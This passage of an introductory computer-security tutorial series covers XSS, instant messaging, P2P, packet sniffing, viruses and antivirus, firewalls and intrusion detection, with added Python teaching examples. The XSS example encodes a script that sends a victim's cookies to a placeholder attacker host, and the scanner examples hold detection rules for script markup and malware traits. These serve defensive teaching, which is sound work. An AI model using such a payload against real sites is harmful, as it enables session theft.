It is an unfortunate fact that many of the features developed to make computing easier, more functional or more entertaining can be turned around and exploited for malicious purposes. Some sites that you visit may actually require active scripting to function properly. When using a web browser like Internet Explorer you can change the settings so that by default active scripting is not allowed. You can then add sites that require active scripting and that you feel are safe to your Trusted Sites security zone (See How To Configure Internet Explorer Security).
Another way dynamic content creates security issues is cross site scripting (XSS). Sites that take input from users and display it back- a search box, a guest book, a discussion forum- without properly checking it for script tags may be vulnerable to XSS attacks. Using XSS an attacker gets the trusted site itself to deliver script to your browser, where it runs with whatever trust you have given that site: it could redirect your connection to another web site entirely, one containing other malicious active scripting, or read the cookies and session information that site has stored in your browser.
Typically the XSS attack is instigated by getting the targeted user to click on a link that carries the malicious script inside it, so that the vulnerable site echoes it back into the page it generates. If the web site does not validate the input or encode it before sending it out, the script will be executed and the attacker could cause all sorts of problems, including stealing passwords and session cookies or, combined with a browser flaw, executing other programs on the target machine.
Cross site scripting vulnerabilities are not associated with any particular browser or web server. It doesn’t matter if the web site is hosted on Microsoft Internet Information Server (IIS) or Apache. It doesn’t matter whether you browse with Internet Explorer, Netscape or Opera. The problems that create XSS vulnerabilities lie in the way dynamic pages are generated and in not having the proper checks in place to validate and encode user-supplied input before sending the output to the user.
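Here is the flaw and its fix side by side in Python, as an added example for this lesson (not code from the original article or from any web server). A search page pastes the user’s query straight into the HTML it returns; the safe version HTML-encodes it first. The attack link is constructed in the script, and attacker.example is a placeholder for wherever the attacker collects stolen cookies.

```python
"""Cross site scripting: a page that echoes user input raw, beside the fix.

Added example for this lesson, not code from the original article or from
any web server. The attacker's collection site attacker.example is a
placeholder; the attack link below is constructed for the demonstration."""
import html
from urllib.parse import parse_qs


def _query_value(query_string, name):
    """Fetch one parameter from the URL's query string (percent-decoding it)."""
    return parse_qs(query_string, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(query_string):
    """Build the results page by pasting the search term straight into the HTML.
    Whatever the user typed is now part of the page's markup."""
    term = _query_value(query_string, "q")
    return f"<html><body><p>You searched for: {term}</p></body></html>"


def render_safe(query_string):
    """Same page, but the term is HTML-encoded, so the browser shows it as text
    instead of interpreting it as tags or script."""
    term = html.escape(_query_value(query_string, "q"), quote=True)
    return f"<html><body><p>You searched for: {term}</p></body></html>"


def contains_active_script(page):
    """Crude check a tester might run on the output: did live markup get through?"""
    lowered = page.lower()
    return "<script" in lowered or "onerror=" in lowered or "javascript:" in lowered


# Constructed attack link. Decoded, the "search term" is:
#   <script>document.location='http://attacker.example/?c='+document.cookie</script>
# which sends the victim's cookies for this site to the attacker.
ATTACK_QUERY = (
    "q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example%2F%3Fc%3D%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(ATTACK_QUERY))
    print("safe:      ", render_safe(ATTACK_QUERY))
```

The point to take from render_safe is that the fix is output encoding for the context the data lands in (here, HTML text), not a blacklist of suspicious words; trying to strip “<script>” and nothing else is exactly the kind of incomplete check that leaves a site vulnerable.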
Some more recent creations commonly used on the Internet are Instant Messaging (IM) and Peer-to-Peer (P2P) Networks. Instant messaging essentially dates back to the invention of Internet Relay Chat (IRC) by a student in Finland in 1988. IRC caught on fast and expanded around the world. In the early 1990’s online service providers like America Online (AOL) and Compuserve used proprietary instant messaging programs and allowed their users to create “buddy lists” of friends and family so they could see who was online at the time. In 1996, ICQ (A play on words meaning “I Seek You”) was released and made freely available. The advent of a buddy-list style instant messaging program that wasn’t tied to any proprietary online service sparked the explosion of instant messaging. Eventually AOL bought ICQ and Compuserve, but other competitors popped up including Yahoo Messenger and Microsoft’s MSN Messenger programs.
Because using IM software requires you to have a service connected to the Internet on an open port, it offers an attack vector for hackers. The IM software tends to have security flaws and vulnerabilities that allow for malicious attacks. In January of 2002 a flaw was announced in AOL Instant Messenger which would allow the attacker to gain access to your system without notifying you, giving you an opportunity to deny the connection or providing any means for tracking the attack. In June of 2002 CERT released an advisory regarding a vulnerability in Yahoo Messenger that would allow an attacker to execute the code of their choice on your computer. The list is long and growing of ways that Instant Messaging software can be used to compromise your system.
Originally, instant messaging was just a means for communicating in real time with other instant messaging users. However, more functionality was added to instant messaging as its popularity grew. IM clients generally have the capability to send and receive files or designate a folder to share out files to your buddy list. Because downloading files in this manner bypasses most corporate security measures many companies have implemented policies banning the use of IM software until a traceable, secure system can be found.
Peer-to-Peer (P2P) networking is a phrase coined to apply to individual PC’s acting as servers to other individual PC’s. In a P2P network all of the computers are peers to each other and are able to act as file servers. Katherine Mieszkowski of Salon was quoted as saying “P2P is a particularly comical new coinage for a business model since the phrase starkly points out that there’s no middleman – so how can anyone possibly make any money?” P2P was made popular primarily by the digital music swapping system created by Shawn Fanning- Napster.
Napster spread like wildfire and other P2P file swapping networks sprung up in its wake. Eventually the Recording Industry Association of America (RIAA) managed to have Napster effectively shut down due to litigation over copyrighted songs being made available through the Napster network. The RIAA may have brought on the untimely demise of Napster (although the phoenix may yet rise from the ashes- in February 2003 Roxio announced plans to resurrect Napster as service to allow songs to be downloaded for a fee Napster Rising From The Grave), but more P2P networks are out there and the juggernaut has too much momentum for the entertainment industry to be able to effectively litigate it away.
With more popular P2P file sharing networks out there like Morpheus, GNUtella and Kazaa users around the globe have installed the client software to allow their machines to act as file servers to the P2P community and allow them to access the files of other computers on the P2P network. Again, the fact that computers participate on one of these P2P networks means they must have certain ports open on their networks or computers. In this case they generally will have at least one folder on their computer shared out as well. Having open ports and open file shares offers another prime target for malicious developers to exploit.
In February of 2002 a Denial-of-Service vulnerability was announced that affected users of Kazaa, Morpheus and Grokster. By exploiting this vulnerability an attacker could cause the system to exhaust available resources and crash. It is also possible for users who are not members of the P2P network to connect to your computer using the port opened by the P2P software and access the files or folders you have made available. Some novice computer users have installed P2P software with the root “C:” drive as their main sharing folder, which makes all of the system files and other critical data available to anyone on the P2P network.
The last topic for this lesson is packet sniffing. Packet sniffing, like most maligned services and applications, serves a legitimate purpose when used in the right way. Packet sniffing can be invaluable in determining problems and troubleshooting issues on your network. However, in the wrong hands a packet sniffer is to your Internet traffic essentially the same as someone tapping your phone conversations.
A packet sniffer captures the individual packet data flowing across a network. Most decent packet sniffer applications will decode the binary data into something intelligible. Some carry it a step further to do protocol analysis and can help identify key information that may be useful. By capturing and decoding packets in this manner a hacker can learn a lot of valuable information about your network and possibly capture passwords or confidential personal data like credit card numbers.
In order to work, the packet sniffer must be on the same network as the originating or intended destination machine. However, if a hacker has managed to install some sort of Trojan horse or backdoor program on one of the computers on either the sending or receiving network they may be able to do the packet sniffing remotely. A switch provides better protection against sniffing from a third-party machine because it forwards network traffic only to its intended destination. If the network traffic goes across a hub, that traffic is repeated to all devices attached to the hub and can therefore be intercepted by any of them.
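To make the hub-versus-switch difference concrete, here is an added simulation (not part of the original article): a hub repeats every frame to every other port, while a learning switch builds a MAC table and forwards unicast frames only to the port it learned for the destination. Host names and MAC addresses are constructed, and "eve" is simply a third machine on the same network that never sends anything.

```python
"""Simulated hub vs. learning switch (added example, not from the article).
Frames, hosts and MAC addresses are all constructed. Shows which hosts can
observe each frame in the two topologies."""

from dataclasses import dataclass

BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class Frame:
    src: str      # source MAC address
    dst: str      # destination MAC address
    payload: str


class Hub:
    """A hub repeats every frame out of every port except the one it came in on."""

    def __init__(self, ports):
        self.ports = dict(ports)  # port number -> host plugged into it

    def forward(self, in_port, frame):
        return sorted(host for port, host in self.ports.items() if port != in_port)


class Switch:
    """A learning switch records the port each source MAC was seen on and sends
    unicast frames only to the learned port; broadcasts and frames for MACs it
    has not learned yet are flooded to all other ports, like a hub."""

    def __init__(self, ports):
        self.ports = dict(ports)
        self.mac_table = {}  # MAC -> port

    def forward(self, in_port, frame):
        self.mac_table[frame.src] = in_port  # learn where the sender lives
        if frame.dst != BROADCAST and frame.dst in self.mac_table:
            out_port = self.mac_table[frame.dst]
            return [] if out_port == in_port else [self.ports[out_port]]
        return sorted(host for port, host in self.ports.items() if port != in_port)


def observers(device, hosts_by_port, traffic):
    """Replay traffic (list of (sender host, Frame)) through device and return
    {host: [payloads that host could observe]}."""
    port_of = {host: port for port, host in hosts_by_port.items()}
    seen = {host: [] for host in hosts_by_port.values()}
    for sender, frame in traffic:
        for host in device.forward(port_of[sender], frame):
            seen[host].append(frame.payload)
    return seen


# Constructed hosts and MAC addresses (not real devices).
HOSTS = {1: "alice", 2: "bob", 3: "eve"}
MAC = {"alice": "02:00:00:00:00:01", "bob": "02:00:00:00:00:02", "eve": "02:00:00:00:00:03"}

# Constructed exchange: alice locates bob with a broadcast, then they talk; eve only listens.
TRAFFIC = [
    ("alice", Frame(MAC["alice"], BROADCAST, "who-has bob?")),
    ("bob", Frame(MAC["bob"], MAC["alice"], "bob is here")),
    ("alice", Frame(MAC["alice"], MAC["bob"], "GET /index.html")),
    ("bob", Frame(MAC["bob"], MAC["alice"], "200 OK")),
]


def compare():
    """Return (what each host sees on a hub, what each host sees on a switch)."""
    return observers(Hub(HOSTS), HOSTS, TRAFFIC), observers(Switch(HOSTS), HOSTS, TRAFFIC)


if __name__ == "__main__":
    hub_seen, switch_seen = compare()
    print("eve on a hub sees   :", hub_seen["eve"])
    print("eve on a switch sees:", switch_seen["eve"])
```

On the hub, eve observes the whole conversation; on the switch she sees only the initial broadcast, which is why a sniffer on a switched network is limited to broadcasts and its own traffic unless the attacker has already compromised one of the endpoints.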
That does it for Lesson 5. Hopefully you now have a better understanding of the concepts behind active scripting, cross site scripting, instant messaging, P2P networks and packet sniffing. I have provided some quick tips to try and help you protect yourself. More in depth security solutions will be provided in lessons 8, 9 and 10. Lesson 6 will be devoted entirely to antivirus software.
The goal of the Computer Security 101 series is to provide an introduction into the basic technology and the terminology and acronyms associated with computers and networks. Armed with an understanding of these things users will be better prepared to defend against existing or potential threats to their computer and network security.
Within the space of a single introductory article it is impossible to cover every aspect of the virus / antivirus topic. I will attempt to provide as much knowledge as I can without overwhelming you. For those of you who would like more in-depth information and detail about how viruses or antivirus works I suggest taking a look at the links to the right of this article.
To begin with we should introduce some terms common to antivirus issues and clarify the distinctions between each of them. The first and primary term is Virus. A virus is malicious code that replicates itself. New viruses are discovered daily. Some exist simply to replicate themselves. Others can do serious damage such as erasing files or even rendering the computer itself inoperable.
A Worm is similar to a virus. They replicate themselves like viruses, but do not alter files like viruses do. The main difference is that worms reside in memory and usually remain unnoticed until the rate of replication reduces system resources to the point that it becomes noticeable.
A Trojan (or Trojan horse) takes its name from the story of the Trojan horse in Greek legend. It is a malicious program disguised as a normal application. Trojan horse programs do not replicate themselves like a virus, but they can be propagated as attachments to a virus.
The term Backdoor is used to describe a secret or undocumented means of getting into a computer system. Many programs have backdoors placed by the programmer to allow them to gain access to troubleshoot or change the program. Some backdoors are placed by hackers once they gain access to allow themselves an easier way in next time or in case their original entrance is discovered.
Malicious code is a catch-all term used to refer to various types of software that can cause problems or damage your computer. The more common classes of programs referred to as malicious code are the previously mentioned viruses, worms, Trojan horses, macro viruses, and backdoors. But, malicious code can also be used as a general term to refer to other malicious or destructive programs not covered by those definitions.
A biological virus spreads from host to host by replicating. In other words, the virus attaches itself to a healthy cell and more or less hijacks the cell. Once it has taken control of the cell it begins to replicate itself- creating more and more copies of the virus which in turn will create more copies of the virus. Eventually, through a sneeze, a cough or a handshake, the infected cells make their way to new hosts and begin the process again.
Computer viruses were named such because of their similarities to the biological virus process. A virus program will attach itself to good or healthy files on the computer system and proceed to spread and infect other files on the system. Eventually, through email, open ports or network shares, the infected files make their way to new hosts and begin the process again.
There are various areas of the computer that can be infected by a virus or malicious code and there are various methods defined for how the infection occurs. The information below is from the Computer Knowledge Virus Tutorial (cknow.com). There may be other lists or terms, but these listings of what and how viruses infect are fairly comprehensive:
What Viruses Infect
System Sector Viruses: These infect control information on the disk itself.
File Viruses: These infect program (COM and EXE) files.
Macro Viruses: These infect files you might think of as data files. But, because they contain macro programs they can be infected.
Companion Viruses: A special type that adds files that run first to your disk.
Cluster Viruses: A special type that infects through the disk directory.
Batch File Viruses: These use text batch files to infect.
Source Code Viruses: These add code to actual program source code.
Visual Basic Worms: These worms use the Visual Basic language to control the computer and perform tasks.
How Viruses Infect
Polymorphic Viruses: Viruses that change their characteristics as they infect.
Stealth Viruses: Viruses that try to actively hide themselves from antivirus or system software.
Fast and Slow Infectors: Viruses that infect in a particular way to try to avoid specific anti-virus software.
Sparse Infectors: Viruses that don’t infect very often.
Armored Viruses: Viruses that are programmed to make disassembly difficult.
Multipartite Viruses: Viruses that may fall into more than one of the top classes.
Cavity (Spacefiller) Viruses: Viruses that attempt to maintain a constant file size when infecting.
Tunneling Viruses: Viruses that try to “tunnel” under anti-virus software while infecting.
Camouflage Viruses: Viruses that attempt to appear as a benign program to scanners.
NTFS ADS Viruses: Viruses that ride on the alternate data streams in the NT File System.
There are well over 50,000 known viruses currently, but only a couple hundred that are actively spreading in the wild (a term used to describe a virus that is live on the Internet). A number of the couple hundred are actually different variants of the same virus which could reduce that number more depending on how you want to count. To get an updated monthly report of the viruses being seen in the wild, visit The WildList Organization.
Most viruses do not do much, or any, harm. Many exist just for the sake of proving that the author was capable of creating a virus that can spread from machine to machine. Some non-damaging viruses may simply be tests of the virus code’s ability to spread so the author can work out any bugs before adding the destructive payload.
Even a virus that does no inherent damage to an infected machine can have a huge negative impact on the Internet at large. In late January of 2003 a worm hit the Internet called SQL Slammer. It took advantage of a known vulnerability in Microsoft SQL Server and spread around the world in less than an hour.
It did no damage to the infected machine per se, but the speed and volume of connections that an infected machine initiated grew exponentially as more machines became infected and caused so much congestion of traffic that it all but shut down the Internet for a few hours.
To guard and protect your computer from known virus, worm and other malicious code threats you need to have antivirus software installed and actively running. You also must keep it updated. New viruses are discovered almost daily. Running antivirus software that hasn’t been updated in a month or more is equivalent to not running antivirus software at all.
The antivirus vendors analyze new malicious code threats as they are discovered. They look for pertinent information that makes the threat unique- size of the file, specific text in the file, message body or subject line, specific ways the file works, etc.- and create a signature or footprint that will identify this threat. These signatures are included in the update files put out by the antivirus vendors. Most vendors update their virus definitions at least weekly.
Identifying the signature of the threat and including it in the updated virus definitions is great for catching known threats, but how do you stop a virus or worm that hasn’t yet been detected and catalogued by the antivirus software vendors? To do this, most vendors use heuristic analysis. Heuristics uses past experience to make educated guesses about the present. Using rules and decisions based on analysis of past network or email traffic, heuristic scanning in antivirus software can self-learn and use artificial intelligence to attempt to block viruses or worms that are not yet known about and for which the antivirus software does not yet have a filter to detect or block.
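The following added example (not the article's code and not any vendor's engine) shows the two approaches side by side: exact signatures catch only what is already in the definitions, while weighted heuristic rules flag files that merely look like past threats. The EICAR string is the industry-standard harmless test pattern; every other sample, signature and rule is constructed for illustration.

```python
"""Toy signature + heuristic scanner (added example; not the article's code
and not any vendor's engine). Samples, the hash signature and all heuristic
rules are constructed. The EICAR string is the real, harmless standard test
pattern that scanners recognise."""

import hashlib
import re

# The EICAR test string: a real, harmless standard used to test scanners.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

# A constructed "worm" body whose whole-file hash we catalogue as a signature.
CONSTRUCTED_WORM = b"MZ" + b"\x00" * 6 + b"constructed worm body: mails itself to everyone"

# The "virus definitions": one byte-pattern signature and one whole-file hash.
SIGNATURES = {
    "EICAR-Test-File": ("bytes", EICAR),
    "Constructed.Worm.A": ("sha256", hashlib.sha256(CONSTRUCTED_WORM).hexdigest()),
}


def signature_scan(data):
    """Return the names of known signatures that match data (known threats only)."""
    digest = hashlib.sha256(data).hexdigest()
    hits = []
    for name, (kind, value) in SIGNATURES.items():
        if kind == "bytes" and value in data:
            hits.append(name)
        elif kind == "sha256" and value == digest:
            hits.append(name)
    return hits


# Constructed heuristic rules: (name, weight, predicate(filename, data)).
# They encode "past experience" about how malicious attachments tend to look.
DOC_EXT = r"\.(jpg|txt|doc|pdf)"
EXEC_EXT = r"\.(exe|scr|pif|vbs|bat)"
HEURISTIC_RULES = [
    ("double-extension", 3,
     lambda name, _: re.search(DOC_EXT + EXEC_EXT + "$", name, re.I) is not None),
    ("executable-disguised-as-document", 3,
     lambda name, data: data.startswith(b"MZ") and re.search(DOC_EXT + "$", name, re.I) is not None),
    ("script-automates-email-client", 2,
     lambda _, data: b"Outlook.Application" in data),
    ("script-sets-run-key", 2,
     lambda _, data: b"CurrentVersion\\Run" in data),
]
HEURISTIC_THRESHOLD = 3  # total weight at which a file is called suspicious


def heuristic_scan(filename, data):
    """Score a file against the rules; return (score, names of triggered rules)."""
    triggered = [name for name, _, pred in HEURISTIC_RULES if pred(filename, data)]
    score = sum(weight for name, weight, _ in HEURISTIC_RULES if name in triggered)
    return score, triggered


def scan(filename, data):
    """Signatures first (exact and cheap); heuristics only for files no signature knows."""
    sigs = signature_scan(data)
    if sigs:
        return {"verdict": "known-malware", "signatures": sigs, "heuristics": []}
    score, rules = heuristic_scan(filename, data)
    verdict = "suspicious" if score >= HEURISTIC_THRESHOLD else "clean"
    return {"verdict": verdict, "signatures": [], "heuristics": rules}


# Constructed sample "files" (name -> contents).
SAMPLES = {
    "eicar.com": EICAR,
    "invoice.exe": CONSTRUCTED_WORM,
    "photo.jpg.exe": b"MZ\x90\x00" + b"\x00" * 16,   # unknown program with a double extension
    "holiday.jpg": b"MZ\x90\x00" + b"\x00" * 16,     # unknown program named like a picture
    "greeting.vbs": b'Set app = CreateObject("Outlook.Application")\r\n'
                    b'rem writes HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
    "notes.txt": b"Reminder: apply the SQL Server patch before the weekend.",
}


def scan_all(samples=SAMPLES):
    """Scan every sample; return {filename: verdict}."""
    return {name: scan(name, data)["verdict"] for name, data in samples.items()}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:16} {scan(name, data)}")
```

Note that "photo.jpg.exe" and "holiday.jpg" are flagged without any signature at all, which is the heuristic engine's whole purpose, and also why heuristics produce false positives that signatures do not.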
There are many products available on the market to help you protect your computer. McAfee VirusScan from Network Associates and Norton Antivirus from Symantec are two of the most recognized names in antivirus software. There are plenty of other options though such as Sophos or F-Secure as well as free options for those who want to protect their computers on a tight or non-existent budget.
You must always be conscious of the email messages you are viewing and who they are from, particularly before opening any file attachments that may be associated with them. Viruses tend to rely on social engineering to get the user to help them spread. In order for the virus to infect your machine and spread to other machines it first needs to execute. The subject line and body of the email message are key to catching the recipient’s interest and tricking them into opening and running the file attachment.
There are a variety of tricks used by viruses to convince the user to open an attachment. Viruses may come disguised as a reply to a legitimate message you had sent the infected user. The viruses generally search many areas of a computer to collect any email addresses available on the infected machine so it can broadcast itself out to them. Many times a virus will come from an address you recognize and trust.
You should remain aware even if you recognize the email address or know the individual allegedly sending the email. Ask yourself if this person would normally send you a message like the one you received? Does this person normally send you file attachments? Does this person have a reason for sending this particular file attachment? If you are the least bit suspicious about any of this, you should contact the user and ask for clarification of the purpose of the attachment before opening it.
Newer viruses tend to do email spoofing though. By forging the “From” address to appear as if it came from a different source it becomes more difficult to identify the infected machine. If the virus is from a spoofed email address you may not be able to identify the true source. If you find that the message did not come from who it says it came from, you should probably assume it is malicious and simply delete it. In any event, if you can’t get a hold of the user you should at least use an updated antivirus program to scan the file before executing it.
While viruses are a serious issue, and it is imperative that users run antivirus software and keep it updated to detect and block new threats, it is equally or more important that users stay current with security updates and patches from their operating system and program vendors. In the past few years the viruses or worms that have had the most impact, like SQL Slammer, have taken advantage of known vulnerabilities for which patches were already available. If users had applied the patches when they became available these viruses and worms would have had little to no effect rather than spreading throughout the world and causing millions of dollars of damage and lost time and productivity.
Using vendor services like Microsoft’s Windows Update site or Red Hat’s email notification service you can stay up to date on the patches currently available. There are also many email lists available from vendors or 3rd-party security sites to help you stay on top of recently discovered vulnerabilities you should be aware of. Recent versions of Microsoft Windows also have an autoupdate feature which will check for Critical updates periodically and provide an icon in the systray when patches become available.
On the opposite end of the spectrum, but potentially almost as damaging, are virus hoaxes. These emails may be just a prank to see how far and how fast someone can get an email distributed around the world, or they could be a diversion to get users to let down their guard and ignore legitimate alerts- a sort of “boy that cried wolf” strategy.
One hoax that keeps coming back suggests that a file called jdbgmgr.exe that shows up with a teddy bear icon in Microsoft Windows is actually a virus file and that you should delete the file immediately and forward this message to everyone you know. Unfortunately, jdbgmgr.exe is a legitimate Windows file that is used for Java applets. Deleting the file won’t render the system inoperable, but it will remove some functionality and you may experience problems running Java applets as you surf the Web.
There are some key pieces of evidence you can look for to indicate that an email may be a hoax. First and foremost, if it asks you to forward this message to everyone you know, odds are it’s a hoax. If it claims to be a virus alert from Microsoft, it is probably a hoax (Microsoft isn’t in the virus / antivirus business and does not distribute virus alerts).
If you receive an alleged virus alert from any source you wouldn’t normally receive such information from, you should always check it out first. If you are in a company, you should notify the network or information security administrator only (do not forward the message to all of your friends and co-workers). If you are a home user or don’t have access to a security administrator there are a number of web sites that catalog known virus hoaxes that you can check to be sure before alerting anyone.
Viruses, worms, Trojans and other malicious code are pretty much here to stay. To protect yourself and your computer from becoming a statistic you need to take certain simple precautions. It is also important that you keep your system from helping to spread any new threat. To do this, you need to run updated antivirus software, keep your system patched and updated and preferably run some sort of hardware or software firewall program. For more information on these basic security measures, read Security Basics in a Home Computing Environment and In-Depth Security.
If you have read the rest of the Computer Security 101 ™ series thus far you already know that the goal is to provide an introduction to the basic technology and the terminology and acronyms associated with computers and networks. The series is designed with the hope and intent that, armed with an understanding of these things, users will be better prepared to defend against existing or potential threats to their computer and network security.
Lesson 6 was devoted entirely to virus and antivirus issues. While trying to be as comprehensive as possible, you can only squeeze so much information into one article. For more detailed information on all aspects of antivirus I recommend that you visit About.com’s Antivirus Software Site.
This lesson will focus on perimeter defense systems- primarily firewalls. We will cover some of the basic firewall techniques and technologies. We will also discuss Intrusion Detection Systems (IDS) and Honeypots. As with Lesson 6, these are all very broad topics and I can’t begin to fit every detail about them into one article- they could be a whole series in and of themselves. Check out the links to the right of this article for more information on these topics.
The original definition of a firewall according to the Merriam-Webster dictionary is “a wall constructed to prevent the spread of fire.” In a physical sense this includes designing buildings so that the walls, floors and ceilings are able to contain or at least slow down the spread of fire.
In a network or computer security sense the model is flipped around somewhat. Rather than a system designed to contain the damage or keep it centralized to a single room (or your network in this case), the purpose of a firewall is to construct a perimeter wall to keep all of the damage out of your room (or network).
A well designed and configured firewall is like having a single point of entry into your building with a security guard at the door allowing only authorized personnel into the building. The firewall will block or allow traffic into your network or computer based on the rules you give it.
Obviously, if you have a twenty foot high brick wall with barbed wire on the top and armed guards monitoring the gate, but there are holes in the wall and tunnels under the wall you won’t be very secure. The simplest way to ensure your firewall is secure is to block everything by default and only authorize the traffic you want to allow in.
There are various techniques or ways of accomplishing this goal. Each has its pros and cons. One may be superior at effectively blocking traffic, but at the expense of impacting the speed and performance of the network or the system it is running on.
The first primary distinction between types of firewalls is hardware vs. software. The naming is misleading because a “hardware” firewall is just a software firewall running on a dedicated piece of hardware or specialized device. At its core, a hardware firewall is still running some sort of operating system on which a software firewall is blocking and authorizing network traffic.
That said, “hardware” firewalls often provide better protection. For starters, if a vulnerability is found for that type of firewall hopefully an attacker exploiting it would only gain access to the firewall device itself. If you are running a firewall application on a domain controller or a web server and the firewall gets compromised the attacker also gains immediate entry to these important systems.
Another consideration is the impact to system performance. Depending on the amount of network traffic coming into your system it can use a great deal of processing power and system resources to assess the various packets and either block or allow them. By running a firewall on a system that has other purposes the resources will have to be shared and the application, the firewall or both will suffer from a lack of resources.
Many cable or DSL routers designed for home use come with a limited built-in firewall. These firewalls tend to be basic packet-filtering devices that simply allow or deny traffic on particular ports depending on how you configure it.
Ports are like channels for your network traffic. Just like you might have to tune your television to channel 35 to watch your favorite TV show or set your radio to a particular frequency to get the music you like to hear, you must also listen or receive traffic on certain channels, or ports, for different types of Internet and World Wide Web traffic.
The default port for web traffic is TCP port 80. In order to access most web sites your computer must initiate a connection on port 80. In this case the initial request for port 80 traffic is coming from your computer. However, unless you are hosting a web site on your computer there is no reason for any external device to try and connect to your computer on port 80. So, you can safely block all incoming port 80 traffic without affecting your ability to surf the Web.
Using this same example, you can essentially block ALL incoming traffic. If your computer is not acting as a file server, FTP server, web server or providing any other service to external computers then there is no reason for any external computer to try and establish a connection with your computer. Just as was illustrated above, you can block all incoming ports without affecting your ability to communicate out on those same ports.
There are two problems with this type of firewall though. First, many only block on the well-known ports which are ports 0 – 1023. There are about 64,000 other possible ports that wouldn’t be blocked. If you have 65,000 doors into your house and only lock 1000 of them you probably aren’t very safe. The other problem is that this solution only blocks inbound connections. You also want to monitor and block programs from the inside from trying to communicate with services or on ports that you haven’t authorized.
For this reason it is advisable to use personal firewall software (see Top Software Firewall Products) on the computer as well. The router firewall will block most “normal” incoming connections. Should some traffic get past the firewall or if your system gets infected with a worm or Trojan horse and tries to interact with the system and establish outbound connections your software firewall will detect this activity and alert you.
There are various techniques or methods employed by firewalls. Some, like the basic cable / DSL router firewalls mentioned above, use simple port blocking or packet filtering. This method can be vulnerable to some exploits that would let an attacker use IP spoofing or other tricks to sneak past the firewall. Other methods like stateful inspection, circuit-level gateways and application gateways provide better security but at the cost of some speed and performance. To learn more about the various methods read What Is A Firewall?.
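As an added example (not the article's code and not any router's firmware), the simulation below runs the same five packets through a stateless port filter and through stateful inspection with an outbound allow list. It shows why "block all incoming ports" still lets web replies in, where the stateless filter has to leave a hole for those replies, and how the stateful filter also catches the outbound connection a personal firewall is meant to stop. All addresses are constructed: 192.168.1.10 is the home PC, 203.0.113.5 a web server it visits and 198.51.100.7 an outside host the PC never contacted.

```python
"""Stateless port filter vs. stateful inspection (added example; not the
article's code and not any product). Addresses and packets are constructed."""

from dataclasses import dataclass

HOME_PC = "192.168.1.10"


@dataclass(frozen=True)
class Packet:
    direction: str    # "in" = arriving from the Internet, "out" = leaving the PC
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    syn: bool = False  # connection-opening segment
    ack: bool = False  # acknowledges something the other side sent


class StatelessFilter:
    """Basic packet filter of the kind in a home router: judges each packet on
    its own. Because web replies come *from* TCP port 80, it has to admit every
    inbound packet with source port 80 whether anyone asked for it or not, and
    it has no say over what leaves the PC."""

    def __init__(self, reply_ports=(80, 443)):
        self.reply_ports = set(reply_ports)

    def allow(self, pkt):
        if pkt.direction == "out":
            return True
        return pkt.src_port in self.reply_ports


class StatefulFilter:
    """Stateful inspection: remembers connections the PC opened and admits an
    inbound packet only if it belongs to one. Outbound traffic is limited to an
    allow list of destination ports, as a personal firewall would do."""

    def __init__(self, outbound_ports=(53, 80, 443)):
        self.outbound_ports = set(outbound_ports)
        self.connections = set()  # (local ip, local port, remote ip, remote port)

    def allow(self, pkt):
        if pkt.direction == "out":
            if pkt.dst_port not in self.outbound_ports:
                return False
            if pkt.syn:
                self.connections.add((pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port))
            return True
        if pkt.syn and not pkt.ack:  # nobody inside asked for a new connection
            return False
        return (pkt.dst_ip, pkt.dst_port, pkt.src_ip, pkt.src_port) in self.connections


# Constructed packet sequence: (description, packet).
SCENARIO = [
    ("browser opens a web page",
     Packet("out", HOME_PC, 51000, "203.0.113.5", 80, syn=True)),
    ("web server replies",
     Packet("in", "203.0.113.5", 80, HOME_PC, 51000, syn=True, ack=True)),
    ("outsider connects to the PC's port 80",
     Packet("in", "198.51.100.7", 40000, HOME_PC, 80, syn=True)),
    ("outsider sends from source port 80 to the PC's file-sharing port",
     Packet("in", "198.51.100.7", 80, HOME_PC, 445, ack=True)),
    ("unknown program connects out on a port not on the allow list",
     Packet("out", HOME_PC, 51001, "198.51.100.7", 6667, syn=True)),
]


def run(firewall):
    """Feed the scenario through one firewall in order; return {description: allowed}."""
    return {desc: bool(firewall.allow(pkt)) for desc, pkt in SCENARIO}


def compare():
    """Return (stateless decisions, stateful decisions) for the scenario."""
    return run(StatelessFilter()), run(StatefulFilter())


if __name__ == "__main__":
    stateless, stateful = compare()
    for desc in stateless:
        print(f"{desc:64} stateless={stateless[desc]!s:5} stateful={stateful[desc]}")
```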
Another perimeter defense that you can employ is an Intrusion Detection System, or IDS. An IDS is not designed to block any traffic per se. An IDS is a device or application used to inspect all network traffic and alert the user or administrator when there have been unauthorized access attempts or actual unauthorized access. Depending on the device or application used, the IDS can either simply alert the user or administrator or it could be set up to block specific traffic or automatically respond in some way.
The two primary methods of monitoring are signature-based and anomaly-based. Signature-based detection relies on comparison of traffic to a database containing signatures of known attack methods. As new vulnerabilities and exploits are discovered you must update the IDS to recognize new attacks.
Anomaly-based detection compares current network traffic to a known-good baseline to look for anything out of the ordinary. Using anomaly-based detection an IDS can theoretically detect attacks that are not yet known and for which no signature yet exists. Both methods have their drawbacks and many IDS systems use a hybrid of the two methods.
The IDS can be placed strategically on the network as a NIDS (network-based intrusion detection) which will inspect all incoming network traffic or it can be installed on each individual system as a HIDS (host-based intrusion detection) which inspects traffic to and from that specific device only.
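The added example below (not the article's code and not any IDS product) is a toy network IDS that runs both methods over constructed flow records: a signature engine that matches known byte patterns, and an anomaly engine that learns each host's normal connections-per-minute from a known-good window and alerts on a sudden fan-out, which is the shape SQL Slammer traffic took on the wire. The worm-like traffic deliberately has no signature, so only the anomaly engine catches it.

```python
"""Toy network IDS with a signature engine and an anomaly engine (added
example; not the article's code and not any product). All flow records,
addresses and signatures are constructed."""

from collections import Counter, defaultdict
from statistics import mean, pstdev

# --- signature-based: known attack patterns (constructed) -------------------
SIGNATURES = [
    # (name, destination port or None for any, byte pattern expected in the payload)
    ("constructed-web-traversal-probe", 80, b"GET /../../"),
]


def signature_alerts(flows):
    """One alert per flow whose payload matches a known signature."""
    alerts = []
    for f in flows:
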